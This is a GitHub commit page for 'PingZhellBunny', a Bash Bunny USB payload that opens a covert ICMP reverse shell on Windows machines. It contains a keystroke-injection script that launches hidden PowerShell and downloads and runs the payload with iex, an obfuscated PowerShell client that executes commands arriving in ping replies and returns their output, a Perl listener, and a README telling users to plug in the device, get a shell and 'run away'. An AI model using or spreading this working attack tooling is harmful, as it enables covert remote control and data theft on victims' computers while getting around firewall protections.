hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #560 from 0iphor13/master

Browse Source 
Updated PingZhellBunny
This commit is contained in:
hak5glytch 2022-10-20 10:36:29 -07:00 committed by GitHub
commit afc3ac3478
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
5 changed files with 58 additions and 121 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
payloads/library/remote_access/PingZhellBunny/Bunny.pl
View File

@ -15,7 +15,7 @@
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhell
# Modified by 0iphor13 for PingZhellBunny
#
#
#
@ -29,7 +29,7 @@ use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Bunny waitin' for connection...\n";
print "Loading PingZhellBunny...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
@ -40,8 +40,16 @@ my $sock = IO::Socket::INET->new(
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
print "Let's wait for PingZhell!\n";
#Unnecessary print output - just for fun
sleep(2);
print ". .\n";
sleep(1);
print ". . .";
sleep(1);
print ". . . .";
sleep(2);
print "PingZhellBunny client ready!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {

86
payloads/library/remote_access/PingZhellBunny/PingZhell.ps1
View File

@ -1,86 +0,0 @@
<#
Original script by nishang - modified by 0iphor13 for PingZhell
Use bunny.pl as a master
When running the master, don't forget to disable ICMP replies by the OS. For example:
$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
Then:
$: perl bunny.pl
Microsoft please don't block, oh dear microsoft corporation
#>
$IPAddress = 'Attacker-IP'
$Delay = 5
$BufferSize = 128
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
$MicrosoftCopyright =@"
_______ ___ __ _ _______ _______ __ __ _______ ___ ___
| | | | | | | | | | | | | | |
| _ | | |_| | ___|____ | |_| | ___| | | |
| |_| | | | | __ ____| | | |___| | | |
| ___| | _ | || | ______| | ___| |___| |___
| | | | | | | |_| | |_____| _ | |___| | |
|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|
Windows PowerShell running as user $env:username on $env:computername `n
"@;
# Copyright Copies Right
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
#Does a german penguin just PingUin?
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
while ($true)
{
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
$index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
$i = 0
#Fragmant larger output into smaller ones to send to the server.
if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
{
while ($i -lt $index )
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
$i +=1
}
$remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
if ($remainingindex -ne 0)
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
}
}
else
{
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
else
{
Start-Sleep -Seconds $Delay
}
}

10
payloads/library/remote_access/PingZhellBunny/PingZhellBunny.ps1 Normal file
View File

@ -0,0 +1,10 @@
$Delay=5;
$BufferSize=128;
$ICMPBunny=New-Object System.Net.NetworkInformation.Ping;
$PingBB=New-Object System.Net.NetworkInformation.PingOptions;
$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');
$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);
$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;};
$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}}

26
payloads/library/remote_access/PingZhellBunny/README.md
View File

@ -1,19 +1,19 @@
**Title: PingZhellBunny**
Author: 0iphor13
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.5<br>
Version: 1.3
What is PingZhellBunny?
**What is PingZhellBunny?**
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.*
*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellBunny input) and sends it commands to execute.*
#
There you go, a reverse shell.
There you go, a reverse shell without the usage of ports.
**Instruction:**
@ -26,16 +26,16 @@ Install dependencies, if needed:
Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start Bunny.pl -> perl Bunny.pl
#
!!!Insert the IP of your attacking machine into PingZhell.ps1!!!
#
<p>Plug in Bashbunny with PingZhellBunny equipped.<br>
Start the client -> `perl Bunny.pl`
<p>!!!Insert the IP of your attacking machine into the payload.txt variable $IP & Load PingZhellBunny.ps1 onto your Bunny!!!<br>
<p>Plug in your BashBunny.<br>
Achieve reverse shell.<br>
run away <3</p>
Credit for code and ideas:
- bdamele
- samratashok
- Nikhil Mittal
- krabelize

43
payloads/library/remote_access/PingZhellBunny/payload.txt
View File

@ -1,39 +1,44 @@
#!/bin/bash
#
# Title: PingZhellBunny
# Description: Get remote access using a icmp reverse shell.
# Description: Getting remote access via ICMP
# Author: 0iphor13
# Version: 1.3
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, Storage
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
Q DELAY 500
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
DUCKY_LANG de
GET HOST_IP
Q DELAY 500
cd /root/udisk/payloads/$SWITCH_POSITION/
ATTACKMODE HID STORAGE
# starting server
LED SPECIAL
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
LED STAGE1
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#After you have adapted the delays for your target, add "-W hidden"
#Opens hidden powershell instance
Q DELAY 1500
RUN WIN "powershell -Exec Bypass -NoP -NonI"
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
Q DELAY 1000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
Q DELAY 3000
Q DELAY 500
#Insert attacking IP
Q STRING "\$IP = '0.0.0.0';"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")"
Q DELAY 400
Q ENTER
Q DELAY 1000
ATTACKMODE HID
LED FINISH